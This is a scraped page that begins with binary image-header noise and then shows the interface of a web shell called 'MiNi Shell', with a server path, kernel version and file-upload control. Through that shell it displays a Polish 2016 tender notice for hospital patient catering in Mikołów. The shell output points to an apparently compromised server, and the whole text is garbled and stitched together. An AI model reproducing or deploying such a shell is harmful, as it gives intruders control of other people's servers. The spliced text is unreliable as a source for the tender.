JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161125/352148-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.szpital-mikolow.com.pl' target='_blank'>www.szpital-mikolow.com.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 352148 - 2016
              z dnia 2016-11-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołów: Świadczenie usług w zakresie przygotowania i dostawy całodziennego wyżywienia dla pacjentów Zamawiającego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Centrum Zdrowia w Mikołowie Sp. z o.o., krajowy numer identyfikacyjny
              24129497000000, ul.
              ul. Waryńskiego 
              2,
              43190  
              Mikołów, woj.
              śląskie, państwo
              Polska, tel.
              323 257 639, e-mail
              , faks
              322 260 860.
              <br />
              Adres strony internetowej (URL): www.szpital-mikolow.com.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: podmiot leczniczy</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.szpital-mikolow.com.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.szpital-mikolow.com.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć z zachowaniem formy pisemnej pod rygorem nieważności, w języku polskim<br />
                Adres:
                <br />Centrum Zdrowia w Mikołowie Sp. z o.o. ul. Waryńskiego 2, 43-190 Mikołów - Sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług w zakresie przygotowania i dostawy całodziennego wyżywienia dla pacjentów Zamawiającego<br /><b>Numer referencyjny: </b>ZP/9/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />ofertę należy złożyć na Pakiet nr 1 i Pakiet nr 2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Pakiet nr 1 
1. sporządzanie w kuchni Wykonawcy całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Mikołowie przy ul. Waryńskiego 2 oraz dla pacjentów Zakładu Pielęgnacyjno - Opiekuńczego (ZPO) w Łaziskach Średnich przy ul. Staszica 4 
2. dostawa posiłków do Działu Żywienia w szpitalu i punktu odbioru posiłków w ZPO  środkami transportu Wykonawcy (jednym bądź dwoma samochodami)
3. rozładowanie pojemników z posiłkami  z samochodu i przewiezienie wózkiem Wykonawcy na wskazane miejsce
4. odbiór pustych pojemników po posiłkach i ich mycie oraz dezynfekcja w pomieszczeniach Wykonawcy
Pakiet nr 2 
Przygotowanie i dostawa śniadań (ok. 10 śniadań w całym okresie obowiązywania umowy) zgodnie z opisem w załączniku nr 1 pkt. II
Szczegółowo przedmiot zamówienia opisany został w załączniku nr 1 do niniejszej SIWZ
Postępowanie o wartości szacunkowej nie przekraczającej wyrażonej w złotych równowartości kwoty 209 000 euro<br /><br /><b>II.5) Główny kod CPV: </b>55321000-6<br /><b> Dodatkowe kody CPV:</b>55322000-3,
                55520000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca musi posiadać zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej (na podstawie art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia (Dz.U.2015.594 j.t. z późn.zm.)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000,00 zł. <br />
                Informacje dodatkowe
                Wykonawca, któremu polisa lub inny dokument, o którym mowa 	wyżej 	wygasa w trakcie realizacji zamówienia zobowiązany jest do złożenia 	oświadczenia, że będzie kontynuował ubezpieczenie i przedstawi niezwłocznie 	Zamawiającemu aktualną polisę (lub inny dokument) na sumę gwarancyjną nie mniejszą 	niż  500 000 zł <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia działalności jest krótszy - w tym okresie wykonał bądź wykonuje co najmniej dwie usługi żywienia zbiorowego (różnorodność diet) w szpitalu o ilości łóżek nie mniejszej niż 100, przez okres co najmniej 1 roku każda  - załącznik nr 4
b) Wykonawca dysponuje co najmniej dwoma pracownikami legitymującymi się wykształceniem 	kierunkowym  kucharz oraz co najmniej jednym dietetykiem z wykształceniem  medycznym  - załącznik nr 5
c)Wykonawca dysponują wyposażeniem zakładu i urządzeniami technicznymi w celu należytego wykonania usługi  - urządzenia stanowiące wyposażenie kuchni oraz termosy, pojemniki i wszelkie opakowania, w których dostarczane będą posiłki muszą posiadać atesty 	dopuszczające do kontaktu z żywnością
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni,  aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp. Zamawiający wezwie Wykonawcę w szczególności do złożenia następujących dokumentów: 
a) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
b) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym odpowiednio oświadczenia Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na  siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c) Wykonawca, który powoduje się na zasoby innych podmiotów, w celu wykazania braku podstaw do wykluczenia składa dokumenty o których mowa w pkt. a) odnośnie tego podmiotu
d) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty , o których mowa w pkt. a)  należy złożyć odnośnie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pozostałe dokumenty Wykonawcy składają tak, aby wykazać, że wspólnie spełniają warunki udziału w postępowaniu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni,  aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp. Zamawiający wezwie Wykonawcę w szczególności do złożenia następujących dokumentów: 
a) zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów 	Państwowej Inspekcji Sanitarnej 
b) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również 	wykonywanych,  w okresie ostatnich 3 lat przed upływem terminu 	składania ofert, a jeżeli 	okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, 	przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane - co 	najmniej  dwie usługi żywienia zbiorowego (różnorodność diet) w szpitalu o ilości łóżek nie 	mniejszej niż 100, przez okres co najmniej 1 roku, każda załącznik nr 4
c) dowody określające czy te usługi zostały wykonane należycie lub są wykonywane 	należycie, przy czym dowodami są referencje, bądź inne dokumenty wystawione przez 	podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych 	lub ciągłych są wykonywane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 	Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy. W 	przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne 	dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 	3 miesiące przed upływem terminu składania ofert
d) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w 	szczególności 	odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z 	informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i 	wykształcenia 	niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 	przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. co 	najmniej dwóch pracowników z wykształceniem kierunkowym  kucharz oraz co najmniej 	jeden dietetyk z wykształceniem  medycznym  załącznik nr 5
e) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności 	cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na 	sumę gwarancyjną nie mniejszą niż 500 000,00 zł<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni,  aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp. Zamawiający wezwie Wykonawcę w szczególności do złożenia następujących dokumentów: 
a) Decyzja Państwowego Powiatowego Inspektora Sanitarnego zatwierdzająca zakład  do 	prowadzenia działalności w zakresie zgodnym z przedmiotem zamówienia  oraz protokół 	ostatniej kontroli sanitarnej nie wcześniejszy niż  z  2016 roku
b) Pozytywna Opinia sanitarna Państwowego Powiatowego Inspektora Sanitarnego 	dopuszczająca środki transportu do przewozu żywności lub zaświadczenie o wpisie do 	rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji 	Sanitarnej oraz protokół ostatniej kontroli sanitarnej nie wcześniejszy niż z 2016 roku
c) oświadczenie Wykonawcy, że dysponuje wyposażeniem kuchni i urządzeniami 	technicznymi niezbędnymi do wykonania przedmiotu zamówienia oraz, że wyposażenie 	kuchni i urządzenia techniczne oraz termosy, pojemniki i wszelkie opakowania, w których 	dostarczane będą posiłki posiadają atesty dopuszczające do kontaktu z żywnością, wraz z 	informacją, że dopuszczenia (atesty) zostaną niezwłocznie udostępnione  na wezwanie 	Zamawiającego
d) oświadczenie Wykonawcy, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia  	posiadają aktualne książeczki zdrowia, szczepienia w szczególności przeciwko WZW typu 	B oraz posiadają zaświadczenie lekarskie z badania przeprowadzonego do celów sanitarno  	epidemiologicznych 
e) oświadczenie Wykonawcy, iż w celu zapewnienia żywności i żywienia stosowane są 	działania zgodne z zasadami  HACCP bądź certyfikat HACCP 
f) oświadczenie Wykonawcy, iż posiada opisane procedury wykonywanych czynności do 	poszczególnych etapów cyklu produkcyjnego  technologię produkcji tzn.:  dostawa 	produktów, składowanie i magazynowanie, produkcja gorących posiłków, zimnych 	posiłków, przechowywanie, wydawanie, transportowanie posiłków, zwrot naczyń, mycie i 	dezynfekcja, wraz z zapewnieniem, iż na wezwanie Zamawiającego niniejsze dokumenty 	zostaną przedłożone w terminie do 3 dni roboczych</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.  Wykonawca zobowiązany jest do złożenia wraz z wypełnionym i podpisanym Formularzem ofertowym sporządzonym według wzoru stanowiącego załącznik do SIWZ, następujące oświadczenia i dokumenty:
1.1 	aktualne na dzień składania ofert oświadczenie  stanowiące wstępne potwierdzenie, że 	Wykonawca nie podlega wykluczeniu  załącznik nr 2 oraz spełniania warunki udziału w  	postępowaniu o udzielenie zamówienia  załącznik nr 3
1.2.	zobowiązanie podmiotu trzeciego, o którym mowa w pkt. V.3 SIWZ  jeżeli 	Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego
1.3	Wykonawca, który  powołuje się na zasoby innych podmiotów, w celu wykazania braku 	istnienia wobec nich podstaw wykluczenia oraz spełnianie warunków udziału w 	postępowaniu w zakresie, w jakim powołuje się na ich zasoby, zamieszcza informacje o tych 	podmiotach  w oświadczeniach, o których mowa w pkt. VI;1;1.1) SIWZ
1.4 	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o 	którym mowa w pkt. VI;1;1.1 SIWZ składa każdy z Wykonawców wspólnie ubiegających 	się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w 	postępowaniu 	oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców 	wskazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
1.5	do oceny jakości wykonywanej usługi - certyfikat zarządzania jakością ISO 22000  	system zarządzania bezpieczeństwem żywności poświadczający zgodność działań
	Wykonawcy z 	normami jakościowymi, gwarantujący jakość wykonywanych usług
1.6.  jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania 	Wykonawcy, do oferty należy załączyć pełnomocnictwo/upoważnienie w formie oryginału 	podpisane przez osoby uprawnione do reprezentowania wykonawcy albo kopii 	poświadczonej za zgodność z oryginałem przez notariusza
1.7.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 	pełnomocnictwo/upoważnienie dla pełnomocnika wykonawców występujących wspólnie do 	reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w 	postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo 	musi być w formie oryginału lub w formie kopii poświadczonej za zgodność z oryginałem 	przez notariusza

2. Dokumenty i oświadczenia składane samodzielnie przez Wykonawcę, po upływie terminu składania ofert:
Wykonawca w  terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności, do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp  załącznik nr 6. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca  może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokumenty należy złożyć odnośnie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
